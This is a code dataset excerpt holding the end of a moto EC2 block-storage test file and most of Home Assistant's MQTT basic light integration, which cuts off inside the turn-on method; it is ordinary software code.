new_volume.size.should.equal(80)
new_volume.snapshot_id.should.equal(snapshot.id)
@mock_ec2
def test_modify_attribute_blockDeviceMapping():
"""
Reproduces the missing feature explained at [0], where we want to mock a
call to modify an instance attribute of type: blockDeviceMapping.
[0] https://github.com/spulec/moto/issues/160
"""
conn = boto.ec2.connect_to_region("us-east-1")
reservation = conn.run_instances('ami-1234abcd')
instance = reservation.instances[0]
instance.modify_attribute('blockDeviceMapping', {'/dev/sda1': True})
instance = ec2_backends[conn.region.name].get_instance(instance.id)
instance.block_device_mapping.should.have.key('/dev/sda1')
instance.block_device_mapping['/dev/sda1'].delete_on_termination.should.be(True)
@mock_ec2
def test_volume_tag_escaping():
conn = boto.connect_ec2('the_key', 'the_secret')
vol = conn.create_volume(10, 'us-east-1a')
snapshot = conn.create_snapshot(vol.id, 'Desc')
snapshot.add_tags({'key': '</closed>'})
dict(conn.get_all_snapshots()[0].tags).should.equal({'key': '</closed>'})
|
mrucci/moto
|
tests/test_ec2/test_elastic_block_store.py
|
Python
|
apache-2.0
| 14,810
|
"""Support for MQTT lights."""
import logging
import voluptuous as vol
from homeassistant.components.light import (
ATTR_BRIGHTNESS,
ATTR_COLOR_MODE,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_EFFECT_LIST,
ATTR_HS_COLOR,
ATTR_MAX_MIREDS,
ATTR_MIN_MIREDS,
ATTR_RGB_COLOR,
ATTR_RGBW_COLOR,
ATTR_RGBWW_COLOR,
ATTR_SUPPORTED_COLOR_MODES,
ATTR_WHITE,
ATTR_WHITE_VALUE,
ATTR_XY_COLOR,
COLOR_MODE_BRIGHTNESS,
COLOR_MODE_COLOR_TEMP,
COLOR_MODE_HS,
COLOR_MODE_ONOFF,
COLOR_MODE_RGB,
COLOR_MODE_RGBW,
COLOR_MODE_RGBWW,
COLOR_MODE_UNKNOWN,
COLOR_MODE_WHITE,
COLOR_MODE_XY,
SUPPORT_BRIGHTNESS,
SUPPORT_COLOR,
SUPPORT_COLOR_TEMP,
SUPPORT_EFFECT,
SUPPORT_WHITE_VALUE,
LightEntity,
valid_supported_color_modes,
)
from homeassistant.const import (
CONF_NAME,
CONF_OPTIMISTIC,
CONF_PAYLOAD_OFF,
CONF_PAYLOAD_ON,
CONF_VALUE_TEMPLATE,
STATE_ON,
)
from homeassistant.core import callback
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.restore_state import RestoreEntity
import homeassistant.util.color as color_util
from .. import CONF_COMMAND_TOPIC, CONF_QOS, CONF_RETAIN, CONF_STATE_TOPIC, subscription
from ... import mqtt
from ..debug_info import log_messages
from ..mixins import MQTT_ENTITY_COMMON_SCHEMA, MqttEntity
from .schema import MQTT_LIGHT_SCHEMA_SCHEMA
_LOGGER = logging.getLogger(__name__)
CONF_BRIGHTNESS_COMMAND_TOPIC = "brightness_command_topic"
CONF_BRIGHTNESS_SCALE = "brightness_scale"
CONF_BRIGHTNESS_STATE_TOPIC = "brightness_state_topic"
CONF_BRIGHTNESS_VALUE_TEMPLATE = "brightness_value_template"
CONF_COLOR_MODE_STATE_TOPIC = "color_mode_state_topic"
CONF_COLOR_MODE_VALUE_TEMPLATE = "color_mode_value_template"
CONF_COLOR_TEMP_COMMAND_TEMPLATE = "color_temp_command_template"
CONF_COLOR_TEMP_COMMAND_TOPIC = "color_temp_command_topic"
CONF_COLOR_TEMP_STATE_TOPIC = "color_temp_state_topic"
CONF_COLOR_TEMP_VALUE_TEMPLATE = "color_temp_value_template"
CONF_EFFECT_COMMAND_TOPIC = "effect_command_topic"
CONF_EFFECT_LIST = "effect_list"
CONF_EFFECT_STATE_TOPIC = "effect_state_topic"
CONF_EFFECT_VALUE_TEMPLATE = "effect_value_template"
CONF_HS_COMMAND_TOPIC = "hs_command_topic"
CONF_HS_STATE_TOPIC = "hs_state_topic"
CONF_HS_VALUE_TEMPLATE = "hs_value_template"
CONF_MAX_MIREDS = "max_mireds"
CONF_MIN_MIREDS = "min_mireds"
CONF_RGB_COMMAND_TEMPLATE = "rgb_command_template"
CONF_RGB_COMMAND_TOPIC = "rgb_command_topic"
CONF_RGB_STATE_TOPIC = "rgb_state_topic"
CONF_RGB_VALUE_TEMPLATE = "rgb_value_template"
CONF_RGBW_COMMAND_TEMPLATE = "rgbw_command_template"
CONF_RGBW_COMMAND_TOPIC = "rgbw_command_topic"
CONF_RGBW_STATE_TOPIC = "rgbw_state_topic"
CONF_RGBW_VALUE_TEMPLATE = "rgbw_value_template"
CONF_RGBWW_COMMAND_TEMPLATE = "rgbww_command_template"
CONF_RGBWW_COMMAND_TOPIC = "rgbww_command_topic"
CONF_RGBWW_STATE_TOPIC = "rgbww_state_topic"
CONF_RGBWW_VALUE_TEMPLATE = "rgbww_value_template"
CONF_STATE_VALUE_TEMPLATE = "state_value_template"
CONF_XY_COMMAND_TOPIC = "xy_command_topic"
CONF_XY_STATE_TOPIC = "xy_state_topic"
CONF_XY_VALUE_TEMPLATE = "xy_value_template"
CONF_WHITE_COMMAND_TOPIC = "white_command_topic"
CONF_WHITE_SCALE = "white_scale"
CONF_WHITE_VALUE_COMMAND_TOPIC = "white_value_command_topic"
CONF_WHITE_VALUE_SCALE = "white_value_scale"
CONF_WHITE_VALUE_STATE_TOPIC = "white_value_state_topic"
CONF_WHITE_VALUE_TEMPLATE = "white_value_template"
CONF_ON_COMMAND_TYPE = "on_command_type"
MQTT_LIGHT_ATTRIBUTES_BLOCKED = frozenset(
{
ATTR_COLOR_MODE,
ATTR_BRIGHTNESS,
ATTR_COLOR_TEMP,
ATTR_EFFECT,
ATTR_EFFECT_LIST,
ATTR_HS_COLOR,
ATTR_MAX_MIREDS,
ATTR_MIN_MIREDS,
ATTR_RGB_COLOR,
ATTR_RGBW_COLOR,
ATTR_RGBWW_COLOR,
ATTR_SUPPORTED_COLOR_MODES,
ATTR_WHITE_VALUE,
ATTR_XY_COLOR,
}
)
DEFAULT_BRIGHTNESS_SCALE = 255
DEFAULT_NAME = "MQTT LightEntity"
DEFAULT_OPTIMISTIC = False
DEFAULT_PAYLOAD_OFF = "OFF"
DEFAULT_PAYLOAD_ON = "ON"
DEFAULT_WHITE_VALUE_SCALE = 255
DEFAULT_WHITE_SCALE = 255
DEFAULT_ON_COMMAND_TYPE = "last"
VALUES_ON_COMMAND_TYPE = ["first", "last", "brightness"]
COMMAND_TEMPLATE_KEYS = [
CONF_COLOR_TEMP_COMMAND_TEMPLATE,
CONF_RGB_COMMAND_TEMPLATE,
CONF_RGBW_COMMAND_TEMPLATE,
CONF_RGBWW_COMMAND_TEMPLATE,
]
VALUE_TEMPLATE_KEYS = [
CONF_BRIGHTNESS_VALUE_TEMPLATE,
CONF_COLOR_MODE_VALUE_TEMPLATE,
CONF_COLOR_TEMP_VALUE_TEMPLATE,
CONF_EFFECT_VALUE_TEMPLATE,
CONF_HS_VALUE_TEMPLATE,
CONF_RGB_VALUE_TEMPLATE,
CONF_RGBW_VALUE_TEMPLATE,
CONF_RGBWW_VALUE_TEMPLATE,
CONF_STATE_VALUE_TEMPLATE,
CONF_WHITE_VALUE_TEMPLATE,
CONF_XY_VALUE_TEMPLATE,
]
PLATFORM_SCHEMA_BASIC = vol.All(
# CONF_VALUE_TEMPLATE is deprecated, support will be removed in 2021.10
cv.deprecated(CONF_VALUE_TEMPLATE, CONF_STATE_VALUE_TEMPLATE),
mqtt.MQTT_RW_PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_BRIGHTNESS_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(
CONF_BRIGHTNESS_SCALE, default=DEFAULT_BRIGHTNESS_SCALE
): vol.All(vol.Coerce(int), vol.Range(min=1)),
vol.Optional(CONF_BRIGHTNESS_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_BRIGHTNESS_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_COLOR_MODE_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_COLOR_MODE_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_COLOR_TEMP_COMMAND_TEMPLATE): cv.template,
vol.Optional(CONF_COLOR_TEMP_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_COLOR_TEMP_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_COLOR_TEMP_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_EFFECT_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_EFFECT_LIST): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_EFFECT_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_EFFECT_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_HS_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_HS_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_HS_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_MAX_MIREDS): cv.positive_int,
vol.Optional(CONF_MIN_MIREDS): cv.positive_int,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_ON_COMMAND_TYPE, default=DEFAULT_ON_COMMAND_TYPE): vol.In(
VALUES_ON_COMMAND_TYPE
),
vol.Optional(CONF_OPTIMISTIC, default=DEFAULT_OPTIMISTIC): cv.boolean,
vol.Optional(CONF_PAYLOAD_OFF, default=DEFAULT_PAYLOAD_OFF): cv.string,
vol.Optional(CONF_PAYLOAD_ON, default=DEFAULT_PAYLOAD_ON): cv.string,
vol.Optional(CONF_RGB_COMMAND_TEMPLATE): cv.template,
vol.Optional(CONF_RGB_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_RGB_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_RGB_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_RGBW_COMMAND_TEMPLATE): cv.template,
vol.Optional(CONF_RGBW_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_RGBW_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_RGBW_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_RGBWW_COMMAND_TEMPLATE): cv.template,
vol.Optional(CONF_RGBWW_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_RGBWW_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_RGBWW_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_STATE_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_WHITE_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_WHITE_SCALE, default=DEFAULT_WHITE_SCALE): vol.All(
vol.Coerce(int), vol.Range(min=1)
),
vol.Optional(CONF_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_WHITE_VALUE_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(
CONF_WHITE_VALUE_SCALE, default=DEFAULT_WHITE_VALUE_SCALE
): vol.All(vol.Coerce(int), vol.Range(min=1)),
vol.Optional(CONF_WHITE_VALUE_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_WHITE_VALUE_TEMPLATE): cv.template,
vol.Optional(CONF_XY_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_XY_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_XY_VALUE_TEMPLATE): cv.template,
}
)
.extend(MQTT_ENTITY_COMMON_SCHEMA.schema)
.extend(MQTT_LIGHT_SCHEMA_SCHEMA.schema),
)
async def async_setup_entity_basic(
hass, config, async_add_entities, config_entry, discovery_data=None
):
"""Set up a MQTT Light."""
async_add_entities([MqttLight(hass, config, config_entry, discovery_data)])
class MqttLight(MqttEntity, LightEntity, RestoreEntity):
"""Representation of a MQTT light."""
_attributes_extra_blocked = MQTT_LIGHT_ATTRIBUTES_BLOCKED
def __init__(self, hass, config, config_entry, discovery_data):
"""Initialize MQTT light."""
self._brightness = None
self._color_mode = None
self._color_temp = None
self._effect = None
self._hs_color = None
self._legacy_mode = False
self._rgb_color = None
self._rgbw_color = None
self._rgbww_color = None
self._state = False
self._supported_color_modes = None
self._white_value = None
self._xy_color = None
self._topic = None
self._payload = None
self._command_templates = None
self._value_templates = None
self._optimistic = False
self._optimistic_brightness = False
self._optimistic_color_mode = False
self._optimistic_color_temp = False
self._optimistic_effect = False
self._optimistic_hs_color = False
self._optimistic_rgb_color = False
self._optimistic_rgbw_color = False
self._optimistic_rgbww_color = False
self._optimistic_white_value = False
self._optimistic_xy_color = False
MqttEntity.__init__(self, hass, config, config_entry, discovery_data)
@staticmethod
def config_schema():
"""Return the config schema."""
return PLATFORM_SCHEMA_BASIC
def _setup_from_config(self, config):
"""(Re)Setup the entity."""
if CONF_STATE_VALUE_TEMPLATE not in config and CONF_VALUE_TEMPLATE in config:
config[CONF_STATE_VALUE_TEMPLATE] = config[CONF_VALUE_TEMPLATE]
topic = {
key: config.get(key)
for key in (
CONF_BRIGHTNESS_COMMAND_TOPIC,
CONF_BRIGHTNESS_STATE_TOPIC,
CONF_COLOR_MODE_STATE_TOPIC,
CONF_COLOR_TEMP_COMMAND_TOPIC,
CONF_COLOR_TEMP_STATE_TOPIC,
CONF_COMMAND_TOPIC,
CONF_EFFECT_COMMAND_TOPIC,
CONF_EFFECT_STATE_TOPIC,
CONF_HS_COMMAND_TOPIC,
CONF_HS_STATE_TOPIC,
CONF_RGB_COMMAND_TOPIC,
CONF_RGB_STATE_TOPIC,
CONF_RGBW_COMMAND_TOPIC,
CONF_RGBW_STATE_TOPIC,
CONF_RGBWW_COMMAND_TOPIC,
CONF_RGBWW_STATE_TOPIC,
CONF_STATE_TOPIC,
CONF_WHITE_COMMAND_TOPIC,
CONF_WHITE_VALUE_COMMAND_TOPIC,
CONF_WHITE_VALUE_STATE_TOPIC,
CONF_XY_COMMAND_TOPIC,
CONF_XY_STATE_TOPIC,
)
}
self._topic = topic
self._payload = {"on": config[CONF_PAYLOAD_ON], "off": config[CONF_PAYLOAD_OFF]}
value_templates = {}
for key in VALUE_TEMPLATE_KEYS:
value_templates[key] = lambda value, _: value
for key in VALUE_TEMPLATE_KEYS & config.keys():
tpl = config[key]
value_templates[key] = tpl.async_render_with_possible_json_value
tpl.hass = self.hass
self._value_templates = value_templates
command_templates = {}
for key in COMMAND_TEMPLATE_KEYS:
command_templates[key] = None
for key in COMMAND_TEMPLATE_KEYS & config.keys():
tpl = config[key]
command_templates[key] = tpl.async_render
tpl.hass = self.hass
self._command_templates = command_templates
optimistic = config[CONF_OPTIMISTIC]
self._optimistic_color_mode = (
optimistic or topic[CONF_COLOR_MODE_STATE_TOPIC] is None
)
self._optimistic = optimistic or topic[CONF_STATE_TOPIC] is None
self._optimistic_rgb_color = optimistic or topic[CONF_RGB_STATE_TOPIC] is None
self._optimistic_rgbw_color = optimistic or topic[CONF_RGBW_STATE_TOPIC] is None
self._optimistic_rgbww_color = (
optimistic or topic[CONF_RGBWW_STATE_TOPIC] is None
)
self._optimistic_brightness = (
optimistic
or (
topic[CONF_BRIGHTNESS_COMMAND_TOPIC] is not None
and topic[CONF_BRIGHTNESS_STATE_TOPIC] is None
)
or (
topic[CONF_BRIGHTNESS_COMMAND_TOPIC] is None
and topic[CONF_RGB_STATE_TOPIC] is None
)
)
self._optimistic_color_temp = (
optimistic or topic[CONF_COLOR_TEMP_STATE_TOPIC] is None
)
self._optimistic_effect = optimistic or topic[CONF_EFFECT_STATE_TOPIC] is None
self._optimistic_hs_color = optimistic or topic[CONF_HS_STATE_TOPIC] is None
self._optimistic_white_value = (
optimistic or topic[CONF_WHITE_VALUE_STATE_TOPIC] is None
)
self._optimistic_xy_color = optimistic or topic[CONF_XY_STATE_TOPIC] is None
supported_color_modes = set()
if topic[CONF_COLOR_TEMP_COMMAND_TOPIC] is not None:
supported_color_modes.add(COLOR_MODE_COLOR_TEMP)
self._color_mode = COLOR_MODE_COLOR_TEMP
if topic[CONF_HS_COMMAND_TOPIC] is not None:
supported_color_modes.add(COLOR_MODE_HS)
self._color_mode = COLOR_MODE_HS
if topic[CONF_RGB_COMMAND_TOPIC] is not None:
supported_color_modes.add(COLOR_MODE_RGB)
self._color_mode = COLOR_MODE_RGB
if topic[CONF_RGBW_COMMAND_TOPIC] is not None:
supported_color_modes.add(COLOR_MODE_RGBW)
self._color_mode = COLOR_MODE_RGBW
if topic[CONF_RGBWW_COMMAND_TOPIC] is not None:
supported_color_modes.add(COLOR_MODE_RGBWW)
self._color_mode = COLOR_MODE_RGBWW
if topic[CONF_WHITE_COMMAND_TOPIC] is not None:
supported_color_modes.add(COLOR_MODE_WHITE)
if topic[CONF_XY_COMMAND_TOPIC] is not None:
supported_color_modes.add(COLOR_MODE_XY)
self._color_mode = COLOR_MODE_XY
if len(supported_color_modes) > 1:
self._color_mode = COLOR_MODE_UNKNOWN
if not supported_color_modes:
if topic[CONF_BRIGHTNESS_COMMAND_TOPIC] is not None:
self._color_mode = COLOR_MODE_BRIGHTNESS
supported_color_modes.add(COLOR_MODE_BRIGHTNESS)
else:
self._color_mode = COLOR_MODE_ONOFF
supported_color_modes.add(COLOR_MODE_ONOFF)
# Validate the color_modes configuration
self._supported_color_modes = valid_supported_color_modes(supported_color_modes)
if topic[CONF_WHITE_VALUE_COMMAND_TOPIC] is not None:
self._legacy_mode = True
def _is_optimistic(self, attribute):
"""Return True if the attribute is optimistically updated."""
return getattr(self, f"_optimistic_{attribute}")
async def _subscribe_topics(self): # noqa: C901
"""(Re)Subscribe to topics."""
topics = {}
last_state = await self.async_get_last_state()
def add_topic(topic, msg_callback):
"""Add a topic."""
if self._topic[topic] is not None:
topics[topic] = {
"topic": self._topic[topic],
"msg_callback": msg_callback,
"qos": self._config[CONF_QOS],
}
def restore_state(attribute, condition_attribute=None):
"""Restore a state attribute."""
if condition_attribute is None:
condition_attribute = attribute
optimistic = self._is_optimistic(condition_attribute)
if optimistic and last_state and last_state.attributes.get(attribute):
setattr(self, f"_{attribute}", last_state.attributes[attribute])
@callback
@log_messages(self.hass, self.entity_id)
def state_received(msg):
"""Handle new MQTT messages."""
payload = self._value_templates[CONF_STATE_VALUE_TEMPLATE](
msg.payload, None
)
if not payload:
_LOGGER.debug("Ignoring empty state message from '%s'", msg.topic)
return
if payload == self._payload["on"]:
self._state = True
elif payload == self._payload["off"]:
self._state = False
self.async_write_ha_state()
if self._topic[CONF_STATE_TOPIC] is not None:
topics[CONF_STATE_TOPIC] = {
"topic": self._topic[CONF_STATE_TOPIC],
"msg_callback": state_received,
"qos": self._config[CONF_QOS],
}
elif self._optimistic and last_state:
self._state = last_state.state == STATE_ON
@callback
@log_messages(self.hass, self.entity_id)
def brightness_received(msg):
"""Handle new MQTT messages for the brightness."""
payload = self._value_templates[CONF_BRIGHTNESS_VALUE_TEMPLATE](
msg.payload, None
)
if not payload:
_LOGGER.debug("Ignoring empty brightness message from '%s'", msg.topic)
return
device_value = float(payload)
percent_bright = device_value / self._config[CONF_BRIGHTNESS_SCALE]
self._brightness = percent_bright * 255
self.async_write_ha_state()
add_topic(CONF_BRIGHTNESS_STATE_TOPIC, brightness_received)
restore_state(ATTR_BRIGHTNESS)
def _rgbx_received(msg, template, color_mode, convert_color):
"""Handle new MQTT messages for RGBW and RGBWW."""
payload = self._value_templates[template](msg.payload, None)
if not payload:
_LOGGER.debug(
"Ignoring empty %s message from '%s'", color_mode, msg.topic
)
return None
color = tuple(int(val) for val in payload.split(","))
if self._optimistic_color_mode:
self._color_mode = color_mode
if self._topic[CONF_BRIGHTNESS_STATE_TOPIC] is None:
rgb = convert_color(*color)
percent_bright = float(color_util.color_RGB_to_hsv(*rgb)[2]) / 100.0
self._brightness = percent_bright * 255
return color
@callback
@log_messages(self.hass, self.entity_id)
def rgb_received(msg):
"""Handle new MQTT messages for RGB."""
rgb = _rgbx_received(
msg, CONF_RGB_VALUE_TEMPLATE, COLOR_MODE_RGB, lambda *x: x
)
if not rgb:
return
if self._legacy_mode:
self._hs_color = color_util.color_RGB_to_hs(*rgb)
else:
self._rgb_color = rgb
self.async_write_ha_state()
add_topic(CONF_RGB_STATE_TOPIC, rgb_received)
restore_state(ATTR_RGB_COLOR)
restore_state(ATTR_HS_COLOR, ATTR_RGB_COLOR)
@callback
@log_messages(self.hass, self.entity_id)
def rgbw_received(msg):
"""Handle new MQTT messages for RGBW."""
rgbw = _rgbx_received(
msg,
CONF_RGBW_VALUE_TEMPLATE,
COLOR_MODE_RGBW,
color_util.color_rgbw_to_rgb,
)
if not rgbw:
return
self._rgbw_color = rgbw
self.async_write_ha_state()
add_topic(CONF_RGBW_STATE_TOPIC, rgbw_received)
restore_state(ATTR_RGBW_COLOR)
@callback
@log_messages(self.hass, self.entity_id)
def rgbww_received(msg):
"""Handle new MQTT messages for RGBWW."""
rgbww = _rgbx_received(
msg,
CONF_RGBWW_VALUE_TEMPLATE,
COLOR_MODE_RGBWW,
color_util.color_rgbww_to_rgb,
)
if not rgbww:
return
self._rgbww_color = rgbww
self.async_write_ha_state()
add_topic(CONF_RGBWW_STATE_TOPIC, rgbww_received)
restore_state(ATTR_RGBWW_COLOR)
@callback
@log_messages(self.hass, self.entity_id)
def color_mode_received(msg):
"""Handle new MQTT messages for color mode."""
payload = self._value_templates[CONF_COLOR_MODE_VALUE_TEMPLATE](
msg.payload, None
)
if not payload:
_LOGGER.debug("Ignoring empty color mode message from '%s'", msg.topic)
return
self._color_mode = payload
self.async_write_ha_state()
add_topic(CONF_COLOR_MODE_STATE_TOPIC, color_mode_received)
restore_state(ATTR_COLOR_MODE)
@callback
@log_messages(self.hass, self.entity_id)
def color_temp_received(msg):
"""Handle new MQTT messages for color temperature."""
payload = self._value_templates[CONF_COLOR_TEMP_VALUE_TEMPLATE](
msg.payload, None
)
if not payload:
_LOGGER.debug("Ignoring empty color temp message from '%s'", msg.topic)
return
if self._optimistic_color_mode:
self._color_mode = COLOR_MODE_COLOR_TEMP
self._color_temp = int(payload)
self.async_write_ha_state()
add_topic(CONF_COLOR_TEMP_STATE_TOPIC, color_temp_received)
restore_state(ATTR_COLOR_TEMP)
@callback
@log_messages(self.hass, self.entity_id)
def effect_received(msg):
"""Handle new MQTT messages for effect."""
payload = self._value_templates[CONF_EFFECT_VALUE_TEMPLATE](
msg.payload, None
)
if not payload:
_LOGGER.debug("Ignoring empty effect message from '%s'", msg.topic)
return
self._effect = payload
self.async_write_ha_state()
add_topic(CONF_EFFECT_STATE_TOPIC, effect_received)
restore_state(ATTR_EFFECT)
@callback
@log_messages(self.hass, self.entity_id)
def hs_received(msg):
"""Handle new MQTT messages for hs color."""
payload = self._value_templates[CONF_HS_VALUE_TEMPLATE](msg.payload, None)
if not payload:
_LOGGER.debug("Ignoring empty hs message from '%s'", msg.topic)
return
try:
hs_color = tuple(float(val) for val in payload.split(",", 2))
if self._optimistic_color_mode:
self._color_mode = COLOR_MODE_HS
self._hs_color = hs_color
self.async_write_ha_state()
except ValueError:
_LOGGER.debug("Failed to parse hs state update: '%s'", payload)
add_topic(CONF_HS_STATE_TOPIC, hs_received)
restore_state(ATTR_HS_COLOR)
@callback
@log_messages(self.hass, self.entity_id)
def white_value_received(msg):
"""Handle new MQTT messages for white value."""
payload = self._value_templates[CONF_WHITE_VALUE_TEMPLATE](
msg.payload, None
)
if not payload:
_LOGGER.debug("Ignoring empty white value message from '%s'", msg.topic)
return
device_value = float(payload)
percent_white = device_value / self._config[CONF_WHITE_VALUE_SCALE]
self._white_value = percent_white * 255
self.async_write_ha_state()
add_topic(CONF_WHITE_VALUE_STATE_TOPIC, white_value_received)
restore_state(ATTR_WHITE_VALUE)
@callback
@log_messages(self.hass, self.entity_id)
def xy_received(msg):
"""Handle new MQTT messages for xy color."""
payload = self._value_templates[CONF_XY_VALUE_TEMPLATE](msg.payload, None)
if not payload:
_LOGGER.debug("Ignoring empty xy-color message from '%s'", msg.topic)
return
xy_color = tuple(float(val) for val in payload.split(","))
if self._optimistic_color_mode:
self._color_mode = COLOR_MODE_XY
if self._legacy_mode:
self._hs_color = color_util.color_xy_to_hs(*xy_color)
else:
self._xy_color = xy_color
self.async_write_ha_state()
add_topic(CONF_XY_STATE_TOPIC, xy_received)
restore_state(ATTR_XY_COLOR)
restore_state(ATTR_HS_COLOR, ATTR_XY_COLOR)
self._sub_state = await subscription.async_subscribe_topics(
self.hass, self._sub_state, topics
)
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
brightness = self._brightness
if brightness:
brightness = min(round(brightness), 255)
return brightness
@property
def color_mode(self):
"""Return current color mode."""
if self._legacy_mode:
return None
return self._color_mode
@property
def hs_color(self):
"""Return the hs color value."""
if not self._legacy_mode:
return self._hs_color
# Legacy mode, gate color_temp with white_value == 0
if self._white_value:
return None
return self._hs_color
@property
def rgb_color(self):
"""Return the rgb color value."""
return self._rgb_color
@property
def rgbw_color(self):
"""Return the rgbw color value."""
return self._rgbw_color
@property
def rgbww_color(self):
"""Return the rgbww color value."""
return self._rgbww_color
@property
def xy_color(self):
"""Return the xy color value."""
return self._xy_color
@property
def color_temp(self):
"""Return the color temperature in mired."""
if not self._legacy_mode:
return self._color_temp
# Legacy mode, gate color_temp with white_value > 0
supports_color = (
self._topic[CONF_RGB_COMMAND_TOPIC]
or self._topic[CONF_HS_COMMAND_TOPIC]
or self._topic[CONF_XY_COMMAND_TOPIC]
)
if self._white_value or not supports_color:
return self._color_temp
return None
@property
def min_mireds(self):
"""Return the coldest color_temp that this light supports."""
return self._config.get(CONF_MIN_MIREDS, super().min_mireds)
@property
def max_mireds(self):
"""Return the warmest color_temp that this light supports."""
return self._config.get(CONF_MAX_MIREDS, super().max_mireds)
@property
def white_value(self):
"""Return the white property."""
white_value = self._white_value
if white_value:
white_value = min(round(white_value), 255)
return white_value
return None
@property
def is_on(self):
"""Return true if device is on."""
return self._state
@property
def assumed_state(self):
"""Return true if we do optimistic updates."""
return self._optimistic
@property
def effect_list(self):
"""Return the list of supported effects."""
return self._config.get(CONF_EFFECT_LIST)
@property
def effect(self):
"""Return the current effect."""
return self._effect
@property
def supported_color_modes(self):
"""Flag supported color modes."""
if self._legacy_mode:
return None
return self._supported_color_modes
@property
def supported_features(self):
"""Flag supported features."""
supported_features = 0
supported_features |= (
self._topic[CONF_EFFECT_COMMAND_TOPIC] is not None and SUPPORT_EFFECT
)
if not self._legacy_mode:
return supported_features
# Legacy mode
supported_features |= self._topic[CONF_RGB_COMMAND_TOPIC] is not None and (
SUPPORT_COLOR | SUPPORT_BRIGHTNESS
)
supported_features |= (
self._topic[CONF_BRIGHTNESS_COMMAND_TOPIC] is not None
and SUPPORT_BRIGHTNESS
)
supported_features |= (
self._topic[CONF_COLOR_TEMP_COMMAND_TOPIC] is not None
and SUPPORT_COLOR_TEMP
)
supported_features |= (
self._topic[CONF_HS_COMMAND_TOPIC] is not None and SUPPORT_COLOR
)
supported_features |= (
self._topic[CONF_WHITE_VALUE_COMMAND_TOPIC] is not None
and SUPPORT_WHITE_VALUE
)
supported_features |= (
self._topic[CONF_XY_COMMAND_TOPIC] is not None and SUPPORT_COLOR
)
return supported_features
async def async_turn_on(self, **kwargs): # noqa: C901
"""Turn the device on.
This method is a coroutine.
"""
should_update = False
on_command_type = self._config[CONF_ON_COMMAND_TYPE]
def publish(topic, payload):
"""Publish an MQTT message."""
mqtt.async_publish(
self.hass,
self._topic[topic],
payload,
self._config[CONF_QOS],
self._config[CONF_RETAIN],
)
def scale_rgbx(color, brightness=None):
"""Scale RGBx for brightness."""
if brightness is None:
# If there's a brightness topic set, we don't want to scale the RGBx
# values given using the brightness.
if self._topic[CONF_BRIGHTNESS_COMMAND_TOPIC] is not None:
brightness = 255
else:
brightness = kwargs.get(
ATTR_BRIGHTNESS, self._brightness if self._brightness else 255
)
return tuple(int(channel * brightness / 255) for channel in color)
def render_rgbx(color, template, color_mode):
"""Render RGBx payload."""
tpl = self._command_templates[template]
if tpl:
keys = ["red", "green", "blue"]
if color_mode == COLOR_MODE_RGBW:
keys.append("white")
elif color_mode == COLOR_MODE_RGBWW:
keys.extend(["cold_white", "warm_white"])
rgb_color_str = tpl(zip(keys, color))
else:
rgb_color_str = ",".join(str(channel) for channel in color)
return rgb_color_str
def set_optimistic(attribute, value, color_mode=None, condition_attribute=None):
"""Optimistically update a state attribute."""
if condition_attribute is None:
condition_attribute = attribute
if not self._is_optimistic(condition_attribute):
return False
if color_mode and self._optimistic_color_mode:
self._color_mode = color_mode
setattr(self, f"_{attribute}", value)
return True
if on_command_type == "first":
publish(CONF_COMMAND_TOPIC, self._payload["on"])
should_update = True
# If brightness is being used instead of an on command, make sure
# there is a brightness input. Either set the brightness to our
# saved value or the maximum value if this is the first call
elif (
on_command_type == "brightness"
and ATTR_BRIGHTNESS not in kwargs
and ATTR_WHITE not in kwargs
):
kwargs[ATTR_BRIGHTNESS] = self._brightness if self._brightness else 255
hs_color = kwargs.get(ATTR_HS_COLOR)
if (
hs_color
and self._topic[CONF_RGB_COMMAND_TOPIC] is not None
and self._legacy_mode
):
# Legacy mode: Convert HS to RGB
rgb = scale_rgbx(color_util.color_hsv_to_RGB(*hs_color, 100))
rgb_s = render_rgbx(rgb, CONF_RGB_COMMAND_TEMPLATE, COLOR_MODE_RGB)
publish(CONF_RGB_COMMAND_TOPIC, rgb_s)
should_update |= set_optimistic(
ATTR_HS_COLOR, hs_color, condition_attribute=ATTR_RGB_COLOR
)
if hs_color and self._topic[CONF_HS_COMMAND_TOPIC] is not None:
publish(CONF_HS_COMMAND_TOPIC, f"{hs_color[0]},{hs_color[1]}")
